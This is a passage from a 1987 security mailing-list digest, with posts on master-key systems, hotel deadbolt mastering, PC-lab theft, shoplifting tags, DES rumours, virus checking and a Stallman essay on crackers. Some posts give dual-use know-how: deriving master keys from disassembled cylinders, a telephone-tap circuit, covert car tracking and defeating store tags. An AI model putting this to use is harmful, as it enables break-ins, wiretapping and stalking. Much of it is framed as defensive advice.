simple reason why master keys tend to have less metal on them than the non-master keys. It's easier to make them that way. Let's take a simple example: A lock that will have one standard key and one master. To key it you start with an empty cylinder (no pins in it yet), the regular key, and the master (with less metal than the regular key). Place the regular key in the cylinder and try different length bottom pin segments in each position until each position contains one bottom segment that is exactly the right length to be flush with the edge of the cylinder. Remove the regular key and insert the master. All of the pin segments will now be too short. Add middle (mastering) segments, 1 each, in each position until their tops are again flush. Now insert the cylinder into the lock using the proper tools. The top pins in the lock are all the same length, no changes in these pins are made. Done. Notice that this is basically a trial and error process. If the master key has less metal than the regular key(s) it can be done in a single pass. If however, the master has more metal in one or more positions, several passes will be required. In a major job with many locks and several levels of mastering, the problem of a sparse master should never occur (unless the locksmith is either lazy or incompetent). Such jobs require significant planing and all of the necessary pin segment lengths can be determined in advance. Keying the locks is then a simple matter of dropping in the right pin segments in the right order. It is not even necessary to have the keys cut yet. Please note that I am not a locksmith, only an interested observer. ---Scott. From: jcmorris@mitre-bedford.ARPA (Joseph C. Morris) 6-Oct-1987 18:26:33 To: misc-security@mitre-bedford.arpa Subj: [1029] Re: master keys Several years ago there was a report that MIT had been hit with numerous breakins (some versions say the intent was pranks, not burglary) which had been accomplished with keys which opened various locked offices. According to the reports (more accurately: rumors) going around the Institute the keys were manufactured by students who had removed the door locks from the bathrooms in the main MIT building (that's buildings 1 through 10) and had disassembled them to find the common pin breaks. All they had to do then was to file a key which aligned the common breaks with the cylinder radius; since the locks represented doors from all parts of the building (despite the range of numbers it's one structure) they had a master for almost every door. Except for buildings in which the bathrooms are routinely locked, who would notice that the doors were missing the lock cylinder? From: oster%dewey.soe.Berkeley.EDU@berkeley.edu (David Phillip Oster) 20-Oct-1987 16:07:25 To: misc-security@ucbvax.berkeley.edu Subj: [492] NSA joke A friend of mine just returned from a math convention. He tells me that the story circulating there is: The NSA is now funding research not only in cryptography, but in all areas of advanced mathematics. If you'd like a circular describing these new research opportunities, just pick up your phone, call your mother, and ask for one. From: steinmetz!barnett@vdsvax. (Bruce G Barnett) 20-Oct-1987 20:17:56 To: misc-security@uunet.uu.net Subj: [799] Re: (none) Murray Karstadt writes: |Does anyone have any experience with on of these systems in a PC lab? |Is there a cheaper way of securing disks while maintaning an open access |system? I don't have a cheap solution, but one alternative is to use a product that provides NFS service to the PC's (yes you need an ethernet card). You would only need one copy of the programs on a hard disk, and the floppies wouldn't be necessary. (Assuming the programs themselves can run on a hard disk without floppies) One such product is available from Sun (PC-NFS). There may be others. -- Bruce G. Barnett uunet!steinmetz!barnett From: warren hik 21-Oct-1987 00:56:37 To: security@RED.RUTGERS.EDU Subj: [667] pc lab > The question is: How can we have a relatively open environment and not > have the disks and manuals ripped off. Put the manuals in a LOCKED manual rack, or have them chained to a table. Have one pc in your lab designated as a file server. Students must bring their own floppies and copy any needed software off off the (read-only) hard disk of the file server onto THEIR OWN DISKS. The file server would not be used except for this purpose to ensure that it was available. Who needs electronic surveillance... -Wren From: James Deibele 21-Oct-1987 03:12:22 To: tektronix!misc-security%reed.uucp@relay.cs.net Subj: [1720] B. Dalton Security Devices >The question is: How can we have a relatively open environment and not >have the disks ripped off. >It would be nice to have one of these systems installed at the lab. Those devices are manufactured by the Knogo corporation and are extremely expensive. They are not terribly effective, and you need to have someone keeping a close eye on things---an easy way to beat the system is to put the tagged item underneath or above the sensor panels. The tags are easy to find if you're looking for them, and not very difficult to remove. I spent a year managing a B. Dalton Software Etc. store, and we always had shoplifting problems. I'd recommend having people check out software by handing over their student ID or whatever instead. We were told that the Knogo system was there solely to scare amateurs: seeing the sensor device, which probably worked, the amateur would not rip off the store. This cuts down shortage (which also includes employee theft, I think) from 30% (unprotected) to 3% (!). Paying a work-study student will probably cost a lot less than installing the alarm system, and you won't have false alarms, etc. Even properly tagged, activated software won't always set off the alarm, so I'd say you're looking at catching someone 7 out of 10 times (if you're lucky)... -- James S. Deibele jamesd@qiclab or jamesd@percival TECHBooks: The Computer Book Specialists (800) TECH-BKS 3646 SE Division Portland, OR 97202 (503) 238-1005 TECHBooks One BBS (#1:105/4.0); 3/12/24 (503) 760-1473 From: ISA@ISEC-OA.ARPA 22-Oct-1987 10:34:13 To: SECURITY@RED.RUTGERS.EDU Subj: [1170] Securing Floppy's FOR MURRAY KARSTADT Read your request for info regarding securing floppy's and have this to pass on. While attending a seminar in Colorado Springs on computer security a firm na med Media Security Inc demonstrated their products. Two of their products will fit your needs and are not very expensive. The first is called "SECUR-DISKETTES" which contain a paper-thin passive-resonant ciruit. These circuits can be retro-fitted on the outside of your existing media (diskette labels). The second product is the Door Detection Unit (DDU) which detects the passive-resonant circuit. The DDU is similar to a metal detector with a 36 inch walk-through pathway. You can contact them in Colorado Springs at 303-531-9411. Hope this will help you out. We are considering purchasing these items to implement Army wide. Good Luck Jim Vavrina Computer Security Specialist Assistant Chief of Staff for Intelligence and Security US Army Information System Engineering Command Ft. Belvoir, VA DDN: ISA@ISEC-OA.ARPA Phone: 703-664-3339 From: 26-Oct-1987 15:20:41 To: security@red.rutgers.edu Subj: [949] Homing device, Shoplifting detector To Wendy Fraker, who wants to track cars: I have never seen such a device advertised. Unless it were a complicated (=expensive) inertial guidance system gizmo, it would basically be something which gave off a signal which you located by triangulation. Maybe a Walkman (TM, or (R), or something) connected to a cheap walkie-talkie would work. But I think you'd need 2 distant locations which could both pick up the transmissions & communicate to each other. To Phil Benchoff, who asks about magnetic shoplifting security devices: Our library uses a magnetizable glue on its books (maybe some iron oxide is in it). They just put a drop in the binding of a new book. So if the stores are using glue, naturally you wouldn't find anything when you disassembled your purchases. From: trwrb!ries@ucbvax.berkeley.edu (Marc Ries) 20-Oct-1987 15:58:49 To: Subj: [1606] Re: garage frobs >I once thought of all the fun I could have if I got a one hundred watt >linear amp and attached my tiny garage door transmitter to it. > >An entire neighborhood with ONE remote control! I installed a new, higher horsepower garage door opener about a year ago (after the old Genie died). Several times, several months back, I noticed that the garage door was up but shrugged it off as having forgotten to close it at night. A couple of weeks later the garage door was up again, only this time, several things had been stolen out of the garage. I changed the codes, but several times at night we caught the door just *opening* by itself with appearently no one around. Finally, I installed a "shunt" circuit to the opener, so that the door can be manually switched to not open. In retrospect, the door has *never* come up by itself during the day. The old door never came up by itself, period. They do use different controllers. However, most (if not all) of the "openings" have been before or after military hellicoptor passes. I remember reading about how alot of door openers get "openitis" when the Presidential Air Force One plane is in town, appearently having to do to with signal jamming. PS: The idea of "cycling thru the codes" is appearently also becoming a problem with the newer "remote" auto alarms. -- Marc A. Ries sdcrdcf!---\ ihnp4!------\----- trwrb! --- ries From: campbell@maynard.BSW.COM (Larry Campbell) 22-Oct-1987 02:28:10 To: misc-security@seismo.css.gov Subj: [1347] Re: car homing devices <>Does anyone know where to conveniently purchase some kind of device <>to place in a car to track where that car is going? There's a local company that makes a gizmo called a LoJack. It's a gizmo you conceal in your car. If the car is stolen, you call the police, who transmit an encoded activation signal. The LoJack receives this signal and activates a radio beacon, and police homing radios can then locate the car in a few hours. Apparently it works quite well and has a range of several or even several dozen miles. It is currently available, but I think it's not cheap (wild guess: $500). I don't know, and rather doubt, whether you can buy one for your own use. You have to register it with the State Police when you install it, presumably so they have a record of the activation code or something. (For paranoids only: this is really so they can track you whenever they want.) And you probably need some sort of license for the transmitter on either end. -- Larry Campbell The Boston Software Works, Inc. Internet: campbell@maynard.bsw.com 120 Fulton Street, Boston MA 02109 uucp: {husc6,mirror,think}!maynard!campbell +1 617 367 6846 From: Jose Rodriguez 26-Oct-1987 14:06:42 To: security@red.rutgers.edu Subj: [430] re: master keys Talking about master keys and such, has anyone seen a type of key that has no teeth and it is just a straight piece of metal? I think they had "safety" stamped on them but I am not sure. When I was a little kid I had a couple but never found out what they were for. Jose jrodrig@edn-vax.arpa From: gatech!codas!ki4pv!tanner@RUTGERS.EDU 23-Oct-1987 07:40:52 To: security@red.rutgers.edu Subj: [1262] Re: Electronic door locks and anti-shoplifting devices The contents of that magical little card (or of the anti-shoplifting device, which is (as suspected) applied to a sample of the merchandise): One of more (for a 4-digit system, 4) layers of metal foil, cut in such a way as to resonate at a certain frequency. Contents of the door-watching box: an rf source, set to sweep across the range of frequencies for which the foil layers are set. Further contents: an rf dip detector, which notices at which frequencies the RF power takes a sudden dive (being sucked up by foil layers). The freqs are numbered, of course, and you can assign a number to any set of M out of N selected. Note that order is not important; thus (eg) {1,4,8,17} will look the same as {1,8,17,4} to the device. Simpler systems may just (like our school library) have one piece of foil glued to the inside of the book. If that freq dips suddenly, you sound the alarm. Print something such as the institution's name on the foil sticker so that people don't realise that it is not just a name-plate, of course. Tanner Andrews, Systems CompuData, Inc. DeLand From: EVERHART%ARISIA.decnet@ge-crd.arpa 27-Oct-1987 02:42:49 To: AWALKER@RED.RUTGERS.EDU Subj: [1089] DES is NOT legally required I'm afraid Peter Wayner misunderstood what I had reported. I was told, by some folks I was inclined to believe, that international communications must be decipherable by NSA. This may be law, regulation with the force of law, or simply misinformation that I was passed. I'm not a lawyer and have neither time nor inclination to dig through the roomsfull of US federal law and regulations to search for any such thing. However I was told this by a few different sources several years back in the context of DES ciphers etc... As I understand it, various agencies, some with 3 letter acronyms, claim the right/power/etc. to require that you furnish the keys to your unbreakable ciphers or that you use breakable ones, DES being breakable when your computer resources include a few Crays, as some agencies' do. I did NOT report that DES is required for international communications. In fact, I'm not sure that it's even a very good idea to use it... glenn From: imagen!hedley@decwrl.dec.com (Hedley Rainnie) 24-Oct-1987 14:37:24 To: security@RUTGERS.EDU Subj: [1338] NSA underwater tap The discussion earlier of what safeguards can be made to protect ones privacy remind me about a description in the new book on the CIA from 1977-1985 (???) I forget the book title, (its in hardback), It describes an operation which Pollard subsequently had leaked to the Soviets, involving the NSA and the Navy. The goal was to place a passive listening device AROUND the underwater cable. This device records the line transitions by command for a one-shot eavesdrop on sensitive military data, The Soviets were so convinced about the security of the cable they did not encrypt the data, as opposed to Soviet land-based comm. which has excellent coding. Once the recorder had done its stuff a submarine would launch a midget earth walker/diver to collect the tape and insert a new one. The device was made so that if the Soviets decided to examine the cable, the device would fall away staying on the bottom, leaving the cable 'untouched'. I think the book called the operation 'Blue Bells' (?), anyway they realised when the device was missing that the job had been compromised. I think a discussion about such interesting security penetrations would be of interest to many. Cheers, Hedley From: 26-Oct-1987 15:21:50 To: security@red.rutgers.edu Subj: [442] Software Security Murray: My favored way to keep students from ripping off original disks is to use only unprotected software. Only a jerk would steal the original when he could make a copy in a minute. Plus, you can keep backups in case someone does, or just give students the backup and keep the original locked away. From: Andy Mondore 26-Oct-1987 18:18:16 To: security@red.rutgers.edu, murray@andromeda.rutgers.edu Subj: [609] Murray Karstadt's item in Security Digest Here at RPI, we use a fairly low-tech solution for disk/manual security in the public labs. During the hours that the lab is open, a site monitor is always present. If a user needs a disk or manual, the user gives his or her ID card to the monitor who then signs the disk or manual out to them. When users return the item, they get back their ID card. As far as I know, the system is fairly successful. From: ut-sally!ivan@uunet.uu.net (Ivan M. Milman) 27-Oct-1987 00:33:40 To: misc-security@uunet.uu.net Subj: [612] Re: Request >I'm doing some research on computer databases used for blacklisting >purposes. An excellent source for such information is "The Rise of the Computer State" by David Burnham. He mentions a company called U.D. Registry which maintained a list of tenants who had been involved in litigation with their landlords. Ivan -- Ivan Milman: ivan@sally.utexas.edu or {ihnp4,ctvax,seismo}!ut-sally!ivan "Basic research is what I do when I don't know what I'm doing." - Werner Braun From: Jeffrey R Kell 28-Oct-1987 08:56:29 To: SECURITY@RED.RUTGERS.EDU Subj: [1514] Re: Master/sub-master keying systems One more lock note: one of my first real paying jobs was as a bellman (read: Flunkie) at a local franchise hotel. They had just over 250 rooms, plus assorted locked service areas (housekeeping, maintenance, storage, etc). Although not a real bona fide locksmith, one of my tasks was to cut keys once a week, as plenty of people don't leave their keys when they check out. All the real keys are kept in a locked cabinet behind the front desk (including masters) and all keys given to guests are just copies. There were three key blanks: two for guest rooms (divided in half by floors, there were two systems) and one for maintenance areas. The maintenance areas were not on a master system at all (somewhat obviously). The rooms had (1) the "maid" key which was a straightforward master cut from the regular room blank, and (2) the "security" master which was identical to the "maid" key except that it had one additional pin; in order to duplicate the "security" master (which you weren't supposed to do, but you get tired of signing keys in/out to do room checks) you had to cut the room master back one additional tumbler location and extend the horizontal grooves back through the extra space. The "security" master would open the deadbolt! I've always felt safer with a chain or doorstop than a deadbolt ever since. /Jeff/ From: "Curtis C. Galloway" 28-Oct-1987 10:34:41 To: Security@RED.RUTGERS.EDU Subj: [1277] Re: Unscrambling satellite signals >A friend of a friend bought a Video-Cypher II box some time ago with the >intention of paying a fee to the various providers of signals he was >interested in. This weekend I learned that this person obtained a chip for >the Video Cypher II box which will unscramble ALL signals at ALL times. As I recall from a magazine article in Radio-Electronics, this particular pirate chip actually contained a valid serial number from some unsuspecting person. The chip was then hacked up to turn on all the satellite services. The net result was that the scrambler company could disable all the "universal" chips by simply deactivating the original serial number. The pirates could keep switching serial numbers, but at the time of the article a few months ago, all the supposed "universal" chips used this technique, and it was not possible to scan the satellite broadcasts for valid encryption keys. --Curt Galloway ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cg13+@andrew.cmu.edu UUCP: ...!{seismo, ucbvax, harvard!andrew.cmu.edu!cg13+ Drop In Any Mailbox, Return Postage Guaranteed From: kludge@pyr.gatech.edu (Scott Dorsey) 21-Oct-1987 10:51:49 To: misc-security@gatech.edu Subj: [1083] Re: telephone tapping Kaptain Kludge's Cheap and Easy Telephone Tap: --------+----| |------------) (----------------- phone | .1 MFD ) ( to mike input of cheap line | or so ) ( cassette recorder ---+----|----| |------------) (----------------- | | | ) 600-1000 ohm transformer, | ( or old transistor radio output +----) transformer to ----+---- 48V relay tape ---+---^ (110Vac relay works too... not well, though) control Total cost: assuming broken transistor radio is lying around, and a tape recorder can be 'borrowed' from somewhere: $5.00 or so for an RS relay. -- Scott Dorsey Kaptain_Kludge SnailMail: ICS Programming Lab, Georgia Tech, Box 36681, Atlanta, Georgia 30332 Internet: kludge@pyr.gatech.edu uucp: ...!{decvax,hplabs,ihnp4,linus,rutgers,seismo}!gatech!gitpyr!kludge From: nuchat!steve@uunet.uu.net (Steve Nuchia) 26-Oct-1987 22:53:10 To: security Subj: [2878] Re: Simson Garfinkel's article, part 3 of 3 > Often a program can be patched so as to remain the same size by using > partially full pages or replacing seldom used routines. On many systems the > modification date can also be changed back to the origional date (this is > nice when copying files). In general these schemes could be based on taking a checksum, CRC, or similar data-reducing agregate function of the data. If you keep several mathematically independent functions of each file you can check the system state with comparitively little overhead and acceptable certainty. The idea is that it is hard to find a patch which simultaneously preserves each check function. > If you keep another copy of the program to run a diff against it should be > hidden so that both the program and the copy aren't changed. Best would be > to bring a copy in off some removable media to do the comparison. Using the reduction allows one to base the scheme on a paper listing or equally secure object. Of course one has to trust the check program, and recursively the tools used to load the program, etc. If you postulate that the system has been corrupted it is very difficult to see how to get to a trustworthy checker. Assuming unix, for instance. You could mount a removable pack containing the trusted program, and we can assume that the virus hasn't invaded the mount system call. Now what? The shell is corrupted, so you can't be too sure it will really execute your checker. The kernel may be infected and translates calls to open on the kernel to open calls on a copy of the old kernel. Isn't security fun? In general security, or trustworthyness, is a property of the system which must derive by strict induction from a trusted base condition. Once the chain of induction is broken by an event which _might_ allow a virus into the securtity base you cannot trust the system again. You _can_ freeze the system and audit it from the outside. On my system I would build an audit program on a bootable floppy and keep it in a safe place. I'm not that paranoid - I believe that I'm not a sufficiently desirable target to expect really sophisticated viral attacks. But if I were I'd do a floppy boot and run a security audit before I made backups each day. The possibility of this is assured by my faith that the hardware physically cannot alter the bootstrap ROM. Of course I have not proved the boostrap code, but its operation is sufficiently removed from the area of interrest that I'm pretty sure it cannot be subverted. -- Steve Nuchia | [...] but the machine would probably be allowed no mercy. uunet!nuchat!steve | In other words then, if a machine is expected to be (713) 334 6720 | infallible, it cannot be intelligent. - Alan Turing, 1947 From: GREENY 26-Oct-1987 15:22:47 To: Subj: [1159] re: Re: Master Keys > Not to mention the MASTER-master-key of most... This is generally known as a Control Key. Only the Locksmiths or Police or other *trustworthy* people are supposed to have these keys. At the school I attend we have such a beastie (or BESTie) for a key system and one of 4 keys will take care of opening any lock on campus. These are 1) Your individual key 2) The Department Master Key 3) The Police Master Key (opens any key with that particular core) 4) The Control Key (which just pulls out the core so it can be changed or so that the latch can be turned with a screw driver....) In general, professional key systems are made so that you can't jiggle your key and get it to open another lock, by 'hitting' the master pins....Usually this is accomplished by using high tension springs or mushroom drivers if they have to have a large # of keys open the lock. bye for now but not for long Greeny Bitnet: miss026@ecncdc Internet: miss026%ecncdc.bitnet@wiscvm.wisc.edu From: *Hobbit* 28-Oct-1987 17:03:33 To: security@RED.RUTGERS.EDU Subj: [1462] mastered systems Creating master keys is *not* a trial-and-error process. A correctly configured system never sees brass until it's all planned out as a huge chart of cut numbers, or actual thousandth-inch measurements. All the cuts conform to the basic common-sense rules of keying, like cuts must be a certain minimum distance apart so you don't get the tiny-split-fell-out screw, and the user keys don't have low cuts near the bow, and the master cuts aren't necessarily all above or below the user cuts, etc. There are even programs for micros out now to help locksmiths plan mastered systems that know these rules and the maximum cut heights of different brands of locks. They also aid the locksmith keep track of what key opens whose door when repairs are needed, and print out the final chart of the whole thing. Similarly, if you're going to try and determine the master combo for a given system, you do need to take at least one example apart. A pair of .001 inch calipers is very helpful, because then one doesn't need the lock itself to cut the key. All you need is pin heights, spacing, and the outer diameter of the plug minus a small slop factor. [The MIT students someone mentioned apparently didn't think of this.] It gets even hairier when you have control keys for Best and friends. Sometimes even *those* are mastered. _H* From: gwyn@brl-smoke.arpa (Doug Gwyn ) 30-Oct-1987 12:56:10 To: misc-security@uunet.uu.net Subj: [2424] Re: master keys jcmorris@MITRE-BEDFORD.ARPA (Joseph C. Morris) writes: >the keys were manufactured by students who had removed the door locks from >the bathrooms in the main MIT building I don't know of any techie university where this doesn't occur. When I was at Rice, it was usually stairwell doors. To make matters worse, there was a "GreatGrandMaster" key that would open most doors on the whole campus. With Best locks (or ones of the same general style), disassembly of a single cylinder (usually involving milling off the top) is tantamount to obtaining the master key. This is due to the fact that generally a single "control key" is used to remove all cylinder cores. Having removed the core, a simple tool (or even a large screwdriver) can be inserted to operate the cylinder. Alternatively, the lock breaker could surreptitiously remove one core at a time (presumably leaving in its place a core of his own, possibly keyed to open on all alternate-numbered splits in each column in case someone tries to enter while the substitute is in place); removed cores can be taken home and disassembled at leisure. Of course, the true master key bitting eventually emerges as the common bitting that would open all examined locks. There are several steps that institutions can take to minimize the risk from such activity. An obvious one is to avoid excessive master-keying, especially the use of a single GGM. Another is to not master-key doors that are usually left unlocked. Periodic rekeying (including control keys) is also advisable. The other big techie pastime at Rice was exploring the "steam tunnel" system; these tunnels connected the major buildings to carry water pipes, conduits, etc. Generally once a single entry was found, one could wander anywhere. University administrations should consider why smart students have to resort to such misdemeanors for intellectual stimulation. One would think that the normal activities should provide that. P.S. I don't recommend this kind of activity, even if you feel the need for some excitement. If you get caught, you'll get more excitement than you bargained for. Try making nitrogen triiodide, or trinitrotoilet tissue, or something else like that for excitement. Too bad you won't get any official credits for it either. Be careful! From: sundc!netxcom!dgidez@seismo.css.gov (Daniel Gidez) 3-Nov-1987 19:10:02 To: seismo!misc-security@seismo.css.gov Subj: [384] night scope I am once again asking about this stupid machine. Where can I buy either a used or surplus nightscope/ or if available and totally independent infrared sniperscope. And yes I do know they are mucho $$$ pls respond dgidez@netxcom.UUCP From: yetti!utzoo!henry@uunet.uu.net (Henry Spencer) 3-Nov-1987 19:39:58 To: misc-security@uunet.uu.net Subj: [857] re: Master keys > There is a very simple reason why master keys tend to have less metal on > them than the non-master keys. It's easier to make them that way. Well, there is also a reason to do things the other way: if the master has less metal on it everywhere than a non-master, then one can file a non-master down to make a master. The only time I ever took a close look at the shapes of keys (in a scheme that used multiple levels rather than distinct keys plus a master), the less powerful keys had less metal on them, so the file trick wouldn't work. (Rats! :-)) -- PS/2: Yesterday's hardware today. | Henry Spencer @ U of Toronto Zoology OS/2: Yesterday's software tomorrow. | {allegra,ihnp4,decvax,utai}!utzoo!henry From: *Hobbit* 4-Nov-1987 01:10:52 To: security@RED.RUTGERS.EDU Subj: [1864] hotel deadbolt hacks There are two ways to go about this. The first method uses two little sprung pins mounted at about 10:00 and 2:00 in the back of the cylinder, just past the last pin. If the key is turned to 4:00 or 8:00, the open bottom of the keyway exposes the end of one of these pins, and it jumps out into the bottom of the keyway, preventing further rotation. The pin is mounted at such an angle that the plug can "retreat" from this wedged position, but not continue past it. A key cut such that there is enough metal protruding past the last pin will keep these pins up inside their holes, allowing full rotation. The second method uses the last pin as a sort of switch. At the last pin position the cylinder is machined out large enough to acommodate a ring, which surrounds the rear end of the plug. This ring has a hole through it for the last pin and a stub sticking off the back near the bottom. It is also of a known thickness. Raising the rear pin to the normal plug shear line will allow the plug to turn, but the ring remains stationary [held by the driver]. At about 4:00 or 8:00, the tailpiece hits the ring's stub and can't rotate any more. The master key raises the last pin to the next level, such that the ring now turns with the plug, and doesn't impede the tailpiece. In either case, full rotation is required to shoot the deadbolt, but only a quarter turn or so pulls the spring latch. Thus a guest key can't shoot the deadbolt but the specially cut masters can. If you're worried about people getting into your hotel room, carry your own keyed cylinders with you and swap them when you arrive. Probably against fire regs, but it works. When was the last time you found yourself inside a burning hotel? _H* From: simsong@broadway.columbia.edu (Simson L. Garfinkel) 31-Oct-1987 16:56:10 To: hunter-larry@yale.arpa, security@red.rutgers.edu Subj: [1802] DES and international communication I just bought John M. Carroll's Computer Security, second edition, which is really a terrible book that I cannot recommend, because it is not adequately footnoted (ie: it doesn't have any references), is full of anecdotal information that is just plain wrong, and has lots of inaccuracies. But it does have some kernels of truth. one of them, about DES, is instructive: Anyway, there is a paragraph in the section on DES which is interesting: "In all fairness to NSA, it should be noted that according to the 1932 Treat of Madrid, every national government is responsible for the nature and contents of all telecommunications messages originating within its territory. The national cipher agency may well have an obligation in international law to be able to break ciphers used by its citizens. In some Western European countries, a private person or firm wishing to use cryptography is obliged to deposit a copy of the keylist with the national Post, Telephone and Telegraph Agency." (p.202) Which is a great paragraph, except that it answers more questions then it raises: which countries, what are the penalties for not doing this, does it apply in United States or Canada (Carroll is a Canadian), and things like that. ................................................................simson BTW: If John M. Carroll *is* reading this mailing list, or if somebody on this mailing list knows him, please ask him to send me a message. I would like to ask him the reasons for some of the inaccuracies in his book. I'm curious if they are intentional or if they are for some sort of "security" reason. From: gwyn@brl-smoke.arpa (Doug Gwyn ) 1-Nov-1987 19:48:37 To: misc-security@uunet.uu.net Subj: [2240] more about master key security In my previous message about techie school lock cracking, I forgot to mention a couple of other important issues. If one has an ordinary unprivileged operating key for a lock, and if the lock is master-keyed, then by disassembling the lock one can quickly determine possible master-key bittings. In particular, in a one-level mastering system, any split in a pin column that does not match the operating key bitting is almost certain to match the master key; if there is only one split in a column, then the master key must have the same bitting as the operating key in that column. This and the previous information I posted makes it clear that in order to gain reasonable security in a master-keyed system in an environment such as a college campus, the lock cylinders must be protected from removal for disassembly and inspection. Properly-installed Best mortise lock cylinders have this property, because they are fastened not only with the typical long screw against a notch in the side of the cylinder that can be loosened after removal of the plate on the side of the door, but they also have an internal diagonal set-screw that prevents simple removal of the cylinder unless the core is first removed with the control key. If the whole system is properly installed, there is no first loose cylinder to be removed to figure out the control key.. Use of restricted key sections can help, too, since one cannot simply buy such a blank at the local 7-11. However, a diligent lock cracker can make his own blanks. I knew a fellow who filed one out of a piece of stainless steel; if you have access to a milling machine, it is not hard to make a suitable key blank. I again remind you that I'm not recommending this activity, which involves more risks than anyone in his right mind should decide to take! It also usually involves property damage, which is unethical. I hope this information will help campus locksmiths improve the security of their lock systems to the point that few students will find this activity sufficiently rewarding to bother with, compared to the effort required. From: "Rex Wheeler (Tiger)" <90720579%WSUVM1.BITNET@wiscvm.wisc.edu> 2-Nov-1987 23:13:12 To: SECURITY@RED.RUTGERS.EDU Subj: [382] Re: pc lab One thing you could do to prevent software from leaving is have PCs with ONLY hard drives (no floppys) You would probably want to have one external floppy drive that you could use to get stuff on and off the hard disks. From: Knock Knock 3-Nov-1987 10:42:23 To: security@marist Subj: [1288] PC Lab Security > Have one PC inn your lab designated as a file server. Student > must bring their own floppies and copy any needed software > off the (read-only) hard disk of the file server onto THIER OWN DISKS. Doesn't this present some legal problems due to the copyright laws? I didn't think it was legal to allow/require people to copy software. Doesn't this also present some technical problems due to copy protections? At BC, I believe we presently use a Check-Point security system. This system is easy to fool if you know a trick or two, but has served as a GOOD deterrent. In addition, each student borrowing software or manuals is required to leave his/her BC ID at the front desk. The front desk then records, on our main computer system, what was borrowed. If the student fails to return the borrowed items, the front desk has thier ID, and the main computer can help locate the student and/or bill them if the administration feels that it's appropriate. Both these systems are openly visible which helps to deter users from attempting thefts. Niether of these systems are perfect, we still lose things, but I think it's the most practical i've seen thus far. Dave R From: kludge@pyr.gatech.edu (Scott Dorsey) 1-Nov-1987 12:46:45 To: misc-security@gatech.edu Subj: [1667] Re: Homing device, Shoplifting detector > To Wendy Fraker, who wants to track cars: I have never seen such a >device advertised. Unless it were a complicated (=expensive) inertial >guidance system gizmo, it would basically be something which gave off a signal >which you located by triangulation. The solution is to install a small oscillator transmitting on the Class C Citizens band in the remote car. Just put out a continuous signal at whatever power you can manage. If possible, run a wire to the car antenna, but a drag line will work. Now in the chase car, you have a loop antenna mounted on the roof (or a ferrite loopstick if you wish to be less conspicuous and can afford to lose the gain), going into a shortwave set with a BFO and an S-meter (like an old military rig or a ham mobile set). By rotating the antenna you can determine the direction of the signal from you. if the car is moving, you can follow it, keeping it at 0' at all times and hope that you are gaining. If it's stationary, you can take a bearing, move over a few blocks, take another bearing and triangulate. Years ago, Fudalla and Associates made a CB beeper. I think Miles Wireless Intercom made one using the FM band, and R.B. Clifton made a 49 MHz version, but it's been a long time since I've been looking at such devices. -- Scott Dorsey Kaptain_Kludge SnailMail: ICS Programming Lab, Georgia Tech, Box 36681, Atlanta, Georgia 30332 Internet: kludge@pyr.gatech.edu uucp: ...!{decvax,hplabs,ihnp4,linus,rutgers,seismo}!gatech!gitpyr!kludge From: Nick Papadakis <@eddie.mit.edu:nick@MC.LCS.MIT.EDU> 2-Nov-1987 22:05:40 To: security@RUTGERS.EDU Subj: [8294] Why secure systems? In the interest of beginning a flame war (things have been too quiet lately ...), I offer the following text, which was written by Richard Stallman in 1983. If I ignore for the moment RMS's interpersonal skills and concentrate on *what he is saying* rather than how he goes about persuading people of its truth (which has alienated a good many folks), I have to admit that it sounds to me as if he is on the right track. What do you think? - nick --- file is oz.ai.mit.edu:whyhack.text.10 --- Recently the teen-age computer "hacker", the security cracker, has become a topic of national concern. But the many articles on the subject have condemned the cracker without showing the galling aspects of the way of life he is rebelling against and without questioning its ethical foundation. There is no hint that the confused cracker of today may be resisting, albeit ineffectually, a serious social problem of tomorrow. If you look at the social organization of the users on a typical timeshared computer of today and compare it with other social groups, it most resembles the Soviet Union. It is pervaded by suspicion, ruled arbitrarily by a small oligarchy, and hostile toward outsiders. This arouses resentment, which inspires the security crackers. But the authoritarian social organization itself is a worse problem than the crackers are. Most computer users see no alternative. I am fortunate in having experienced one. At the MIT laboratory where I have worked as a researcher for ten years, our old computer system treated users as free equals with a responsibility to cooperate, and guests were welcome. Our hospitality guided clever young people to become responsible engineers rather than crackers. On the typical computer system, the activities of the ordinary users are regulated very narrowly and precisely by the elite, who are bound by no principle of fairness or due process and allow no appeal. Which files you can read, which files you can write, how many files you can have, what programs you can run, how long you can use them, and when you can log in are under their control. They can bump you off the computer at any time. They can watch what you type as you use the computer; you cannot watch them. They can make it very easy for you to do your job, if they like you, or if you curry favor. Or they can obstruct you at every turn, making your life miserable. You have no recourse. They can use the commands that change a user's restrictions, and you cannot, because your restrictions don't permit it. The users are suspicious of each other, and use "file protection" to deny each other access to files. Often this means you cannot make progress in your work because you need to fix a program you cannot get at. People with high morale become discouraged and cynical because of this. The authorities are immune to file protection, however, and can easily erase your file if they do not like what it says. People outside the organization are viewed with hostility and suspicion. They are presumed to lack only an opportunity to delete or scramble all the files on the computer. If the computer is idle, at night for example, its computing power goes to waste rather than allow an outsider to use it for a constructive purpose (such as learning to program). Now imagine that one of the people outside the organization, the recipient of all this suspicion and hostility, is a hacker: a person who is curious, playful and enjoys clever humor. (When computer researchers at MIT in the 1960's first began calling themselves "hackers", this is what they meant. I am proud to call myself a hacker, and I call security-breakers "crackers" to emphasize the distinction.) A hacker, finding a mysterious and complicated computer system, wants to understand it. He would like to explore the computer system, to learn how to use it, or to learn how it works. He knows in advance what reception he will get if he simply asks to use the computer when there is spare time. And he senses intuitively that computer system authorities in general are amoral and do not deserve respect. Naturally, he tries to sneak in and use the computer anyway. He becomes a cracker. If successful, he gets to explore and learn, and can be proud of his cleverness as well. Beefed-up security measures only make the battle of wits more challenging and absorbing. But if he is only a teen-ager, he is probably not used to the kind of thinking that would enable him to question the social system he is part of. (The teen-agers who are politically aware are usually not the computer enthusiasts.) He knows only that he has something to resent. So he does not make a serious attempt to change the system. The best he can manage is instinctive, furtive disobedience. This is why the young cracker seems so usure of the rightness of his actions, and occasionally may do minor damage, almost without noticing. He has not asked the question of how he ought to behave, or how the computer owners ought to behave. This is also why it is so easy to win a cracker over to the security-enforcing establishment with personal inducements. Joining the authorities will end his direct personal difficulties and recognize his cleverness, even better than successfully evading them. Without an ethical awareness, he does not see that he solves his own problem only by contributing to similar problems for others. The software on most computer systems is designed to support the ruling class just as surely as the KGB is. The software written and used by the hackers at MIT was designed to make users free and equal. Our system had no restrictions that could be imposed on selected users; all users were treated alike. Thus nobody could seize power by restricting everyone else. We did not care whether a change to the files was authorized; we cared whether it was an improvement. This can only be decided by human beings, on a 